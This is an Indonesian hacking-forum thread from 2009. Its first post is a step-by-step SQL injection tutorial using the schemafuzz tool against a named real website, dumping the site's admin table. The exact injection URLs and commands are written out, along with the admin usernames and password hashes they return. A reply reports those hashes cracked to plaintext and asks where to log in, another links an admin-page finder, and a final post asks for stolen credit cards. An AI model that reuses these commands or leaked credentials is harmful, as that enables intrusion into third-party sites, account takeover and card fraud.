Sedikit Penggunaan Tools untuk SQL Inject
43 views
Skip to first unread message
WoNX
Apr 12, 2009, 5:19:30 AM4/12/09
to jogjahacking
Langsung menuju TKP saja deh, dari pada kelamaan.
Kali ini kita gunakan schemafuzz, apakah itu? silahkan cari sendiri,
bagai mana menggunakannya bisa dibaca di banyak posting baik forum
maupun blog.
Bahan-bahan yang dibutuhkan;
1. Python
2. Schemafuzz
3. Koneksi Internet
4. Target Operasi.
-------------------------------------------------------
Langkah pertama tentu saja dengan membuka halaman search engine (my
fav is google)
disana kita mencari target dengan mengetikan kerword bebas sesuai
dengan feeling.
Kebetulan saya menemukan target bagus yaitu http://dibekasi.net/banner_klik.php?id_bnr=37'
karena ditambahkan tanda ( ' ) sehingga muncul You have an error in
your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '\'' at line 1. Itu
adalah salah satu cara mengetahui apakah web ada vurln atau tidak.
Sebenarnya masih ada beberapa cara lain, silahkan ber eksplorasi.
Langkah kedua langsung menggunakan alat yaitu schemafuzz:
1. Schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31" --
findcol
untuk mengetahui column (angka ajaib yang digunakan untuk proses
injeksi)
maka akan muncul
http://dibekasi.net/banner_klik.php?id_bnr=31+AND+1=2+UNION+SELECT+0,1,2,darkc0de,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26
itu digunakan untuk injeksi selanjutnya.
2. Schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31+AND
+1=2+UNION+SELECT+0,1,2,darkc0de,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26" --dbs untuk mengetahui semua database yang dipunyai oleh user
tersebut.
3. Untuk melihat table dan fieldnya semua di semua database
perintahnya:
Schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31+AND
+1=2+UNION+SELECT+0,1,2,darkc0de,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26" --full
nanti akan muncul table beserta field-fieldnya, seperti:
--cut--
[60]useradmin:
id_user,nama,username,password,level,user,del,welcome,logout
--cut--
4. Untuk melihat isi tablenya:
schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31+AND
+1=2+UNION+SELECT+0,1,2,darkc0de,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26" --dump
-D "adztrel_dibekasinet" -T "useradmin" -C "username,password"
Hasilnya : [0] sa:3bea988934f111279159c7fbfd82ddf9:
Silahkan artikan sendiri apa maksudnya, dan untuk apa itu.
--------------------------------------------------------------------------------------------------------
Buat yang tahu duluan/lebih mahir mohon maaf bukannya bermaksud
menggurui tapi cuma mau share.
Buat yang ingin lebih tahu silahkan berdiskusi disini.
--------------------------------------------------------------------------------------------------------
NB :
Saya masih nyubi.
Best Regards
WoNX Always Newbie
Kali ini kita gunakan schemafuzz, apakah itu? silahkan cari sendiri,
bagai mana menggunakannya bisa dibaca di banyak posting baik forum
maupun blog.
Bahan-bahan yang dibutuhkan;
1. Python
2. Schemafuzz
3. Koneksi Internet
4. Target Operasi.
-------------------------------------------------------
Langkah pertama tentu saja dengan membuka halaman search engine (my
fav is google)
disana kita mencari target dengan mengetikan kerword bebas sesuai
dengan feeling.
Kebetulan saya menemukan target bagus yaitu http://dibekasi.net/banner_klik.php?id_bnr=37'
karena ditambahkan tanda ( ' ) sehingga muncul You have an error in
your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '\'' at line 1. Itu
adalah salah satu cara mengetahui apakah web ada vurln atau tidak.
Sebenarnya masih ada beberapa cara lain, silahkan ber eksplorasi.
Langkah kedua langsung menggunakan alat yaitu schemafuzz:
1. Schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31" --
findcol
untuk mengetahui column (angka ajaib yang digunakan untuk proses
injeksi)
maka akan muncul
http://dibekasi.net/banner_klik.php?id_bnr=31+AND+1=2+UNION+SELECT+0,1,2,darkc0de,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26
itu digunakan untuk injeksi selanjutnya.
2. Schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31+AND
+1=2+UNION+SELECT+0,1,2,darkc0de,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26" --dbs untuk mengetahui semua database yang dipunyai oleh user
tersebut.
3. Untuk melihat table dan fieldnya semua di semua database
perintahnya:
Schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31+AND
+1=2+UNION+SELECT+0,1,2,darkc0de,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26" --full
nanti akan muncul table beserta field-fieldnya, seperti:
--cut--
[60]useradmin:
id_user,nama,username,password,level,user,del,welcome,logout
--cut--
4. Untuk melihat isi tablenya:
schemafuzz.py -u "http://dibekasi.net/banner_klik.php?id_bnr=31+AND
+1=2+UNION+SELECT+0,1,2,darkc0de,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26" --dump
-D "adztrel_dibekasinet" -T "useradmin" -C "username,password"
Hasilnya : [0] sa:3bea988934f111279159c7fbfd82ddf9:
Silahkan artikan sendiri apa maksudnya, dan untuk apa itu.
--------------------------------------------------------------------------------------------------------
Buat yang tahu duluan/lebih mahir mohon maaf bukannya bermaksud
menggurui tapi cuma mau share.
Buat yang ingin lebih tahu silahkan berdiskusi disini.
--------------------------------------------------------------------------------------------------------
NB :
Saya masih nyubi.
Best Regards
WoNX Always Newbie
IBNU SINA
Apr 13, 2009, 9:12:23 PM4/13/09
to jogjah...@googlegroups.com
--- On Sun, 4/12/09, WoNX <wonx...@gmail.com> wrote:
//Asalamu'alaikum
saya sudah mendapatkan user dan pass pada tabel "useradmin"
hasilnya :
[0] 1:sa:3bea988934f111279159c7fbfd82ddf9:Super Admin:
[1] 44:jkab5z3n:f97530aaffcfc9045b28ea891e65d08b:Super Admin:
[2] No data
setelah saya crack pass menjadi (515190744)dan (ex1hc12c)
Nah yang saya bingung ni pasword utuk Cpanel atau hanya Super Admin di web?
seandainya itu hanya Super Admin di web terus alamat loginnya dimana ya ?
hehe...
tolong kasih pencerahanya ya... !!
maklum saya masik orang awam klw masalah ky ginian.....
WoNX
Apr 16, 2009, 7:24:15 AM4/16/09
to jogjahacking
Itu adalah user dan pasword dari admin website tsb.
untuk mencari halaman login administratornya bisa dengan coba-coba
sendiri atau dengan tools.
mengenai toolsnya saya belum menemukan yang bener2 cocok.
kalau ada yang punya bisa share.
Thank's atas responnya.
NB: Ibnusina ini dari #hitamputih@DalNet ya?
untuk mencari halaman login administratornya bisa dengan coba-coba
sendiri atau dengan tools.
mengenai toolsnya saya belum menemukan yang bener2 cocok.
kalau ada yang punya bisa share.
Thank's atas responnya.
NB: Ibnusina ini dari #hitamputih@DalNet ya?
cH1km0nK
Apr 16, 2009, 8:06:08 AM4/16/09
to jogjah...@googlegroups.com
owh ya buat tambahan z klo mo nyari alamat login pake bantuan toolz
syaratnya harus di instal framwork
http://www.4shared.com/file/97784534/38e1ecf/reiluke_adminpagefinder.html--
By : cH1km0nK
http://mocachikmonk.web.id
http://chikmonk.co.cc
http://wss-id.org/blogs/chikmonk
syaratnya harus di instal framwork
http://www.4shared.com/file/97784534/38e1ecf/reiluke_adminpagefinder.html
By : cH1km0nK
http://mocachikmonk.web.id
http://chikmonk.co.cc
http://wss-id.org/blogs/chikmonk
Haru R4v3
May 2, 2009, 11:49:35 PM5/2/09
to jogjah...@googlegroups.com
Hallo tmen2 smua,,
Klo ada yg pny CC yg masih fresh, aq minta 1 ya,
Please. . . . .
Pada tanggal 12/04/09, WoNX <wonx...@gmail.com> menulis:
Klo ada yg pny CC yg masih fresh, aq minta 1 ya,
Please. . . . .
Pada tanggal 12/04/09, WoNX <wonx...@gmail.com> menulis:
Reply all
Reply to author
Forward
0 new messages